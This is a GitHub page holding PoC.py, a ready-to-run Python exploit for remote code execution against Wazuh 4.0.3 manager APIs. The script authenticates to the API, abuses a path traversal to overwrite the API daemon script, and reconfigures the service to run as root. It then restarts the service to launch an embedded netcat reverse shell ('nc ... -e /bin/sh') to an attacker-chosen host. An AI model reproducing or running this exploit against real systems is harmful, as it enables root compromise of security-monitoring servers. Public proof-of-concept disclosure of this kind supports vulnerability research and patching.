-
Notifications
You must be signed in to change notification settings - Fork 0
/
PoC.py
127 lines (94 loc) · 3.92 KB
/
PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
# Exploit Title: Wazuh 4.0.3 API RCE
# Author: WickdDavid (Davide Meacci)
# Date: 2021-01-01
# Vendor Homepage: https://github.com/wazuh/wazuh
# Version : 4.0.3
import requests
import sys
import argparse
import time
import json
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')
parser.add_argument('-user', dest='username',required=True,
help='wazuh API username')
parser.add_argument('-pwd', dest='password',required=True,
help='wazuh API password')
parser.add_argument('-lip', dest='srcip',required=True,
help='listening server')
parser.add_argument('-lport', dest='srcport',required=True,
help='listening port')
parser.add_argument('-tip', dest='destip',required=True,
help='target server ip (wazuh API)')
parser.add_argument('-tport', dest='destport',required=True,
help='target server port (wazuh API)')
args = parser.parse_args()
# executed payload may be changed here
exec_payload = """
import os #:l
os.system("nc %s %s -e /bin/sh") #:l
""" % (args.srcip, args.srcport)
config_payload = { "drop_privileges": False }
proxies = {
"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"
}
target = "https://%s:%s" % (args.destip,args.destport)
auth_token = ""
path_traversal = "etc/lists/../../../../.."
headers = {}
# step 1 - obtaining auth token
r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False)
if(r.status_code == 200):
auth_token = r.text
headers["Authorization"] = "Bearer %s" % auth_token
else:
print("[!] No auth code recovered. Check username and password")
exit(1)
# step 2 - Privilege Escalation on API (not implemented)
# step 3 - Save files to be restored later
file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py"
print("[+] Saving files to restore later...")
r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)
f = open("backup.py","w")
f.write(json.loads(r.text)["contents"])
f.close()
time.sleep(1)
# step 4 - Local Privilege Escalation
print("[+] Changing API config to run as root...")
r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False)
time.sleep(1)
# step 5 - Restart server (now api service runs as root)
print("[+] Restarting server...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload
print("[+] Uploading payload...")
r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)
#print(r.text)
time.sleep(1)
# step 7 - Restart server (now malicious payload will be run by the server)
print("[+] Restarting API service for the last time...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
print("[+] Payload executed, check your shell now.")
print("[+] Remember to restore changed file (check local backup file)")